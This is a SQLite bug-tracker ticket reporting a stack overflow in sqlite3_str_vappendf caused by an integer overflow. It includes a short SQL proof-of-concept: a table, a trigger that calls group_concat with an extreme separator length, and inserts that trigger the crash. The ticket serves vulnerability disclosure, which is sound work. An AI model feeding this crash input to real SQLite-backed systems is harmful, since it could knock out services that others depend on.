/ Ticket Change Details
Login
Home Timeline Forum
Formatted History Page Raw Timeline
Overview

Artifact ID: e6eaff95c92ac3cd0bc42f001dc3d512d2e32f13563a906af961192fdc7bdd3c
Ticket: 23439ea5822411389c8edac234c08f2cc27ef3e9
Stack overflow in sqlite3_str_vappendf, caused by int overflow
User & Date: yongheng 2020-05-23 17:52:02
Changes

  1. icomment: 
    Affected latest release version. 

POC:
---
CREATE TABLE a(b DOUBLE CHECK( NOT CASE WHEN printf(b, b) THEN 0 END) UNIQUE ON CONFLICT REPLACE);
CREATE TRIGGER c INSERT ON a BEGIN INSERT INTO a SELECT group_concat(b, 2147483647) FROM a;END;
INSERT INTO a(b, b, b) VALUES(NULL, 9, 3);
UPDATE a SET b = 0;
INSERT INTO a VALUES('GERMANY''s%'), ('Y'), ('Brand#23')
---
  2. login: "yongheng"
  3. mimetype: "text/plain"
  4. severity changed to: "Severe"
  5. status changed to: "Open"
  6. title changed to: 
    Stack overflow in sqlite3_str_vappendf, caused by int overflow
  7. type changed to: "Code_Defect"
This page was generated in about 0.004s by Fossil 2.24 [71919ad1b5] 2024-04-17 13:27:34